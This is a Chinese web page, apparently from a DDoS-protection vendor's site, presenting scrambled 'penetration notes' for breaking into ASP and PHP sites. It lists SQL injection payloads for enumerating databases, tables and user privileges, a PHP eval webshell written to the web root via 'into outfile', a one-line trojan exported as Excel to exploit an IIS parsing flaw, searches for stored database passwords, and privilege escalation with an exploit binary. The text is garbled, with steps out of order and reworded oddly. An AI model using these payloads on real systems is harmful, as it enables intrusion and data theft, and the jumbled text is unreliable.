渗透笔记之足本DDoS高防入侵(ASP、PHP)-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!
QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 渗透笔记之足本DDoS高防入侵(ASP、PHP)

渗透笔记之足本DDoS高防入侵(ASP、PHP)

小墨安全管家 2020-09-08 13:08 CC防护 89 ℃
DDoS防御

2.建立一具有一具A字段的表 表名为a 字段类型为字符长度为50,在表A的a字段插入密码为90sec的一句话木马,把表a的内容导出为物理路径的一具EXCEL文件,导出为EXCEL后在利用IIS解析漏洞就能够变成小马了。

Char(60)表示 <

1.数据库类型,简单的直截了当利用上面的相关语句就能够

PHP+MYSQL

3.数据库权限:and ord(mid(user(),1,1))=114 /* (页面正常讲明为root)

PS:高级用法:Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1

语句型(IIS报不报错,语句自个儿区分):

提权:

and  (select count(*) from msysobjects)>0 ……(页面错误为access数据库)

@$result = mysql_query($query, $link) or die ("Execute failed");

version>0  (爆SQLServer版本信息以及服务器操作系统的类型和版本信息)

4.爆操作系统相关信息:and 1=2 union all select @@global.version_compile_os from mysql.user /*

Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

输入以下的内容

推断MYSQL权限:

3.利用系统的漏洞举行溢出提权:利用巴西烤肉提权,在CMD命令一行里输入C:\recycler\1.exe空格“CMD命令”,1.exe算是巴西烤肉咯

22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置

第一种想法:直截了当写马(Root权限)

//这一步是执行那个Shell函数,打开服务器的6666端口.

//那个地点挑选使用MySQL数据库表.固然你也能够挑选别的,如test.

4.利用表爆字段:+union+select+1,2,3,4,column_name,5+from+information_schema.columns+where+table_name=爆出来的字段的16进制                                           或者:and 1=2 union select 1,2,3,4,column_name,5 from information_schema.columns where table_name=爆出来的字段的16进制--

and (select top 1 asc(mid(user,1,1)) from name)>97页面错误

%' and 1=1 and '%'='% 或者 %' and 1=2 and '%'='%

或者and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=数据库名的16进制 limit 1,1--

//那个地点的root\root算是从my.ini中读取的用户和密码.

5.在conn.asp webconfig.asp等文件寻找SA密码或者寻找inc.php 等文件里面的ROOT密码(能够用CMD语句寻找,如:利用CMD命令 dir /s d:\conn.asp 或者 dir /s d:\*inc*.php 来寻找配置文件)

3.+union+select+1,2,3,4,table_name,5+from+information_schema.tables+where+table_schema=数据库名的16进制+limit+1,1

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

$link=mysql_connect('127.0.0.1','root','root');


DDoS防御

当前位置:主页 > CC防护 > 渗透笔记之足本DDoS高防入侵(ASP、PHP)

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119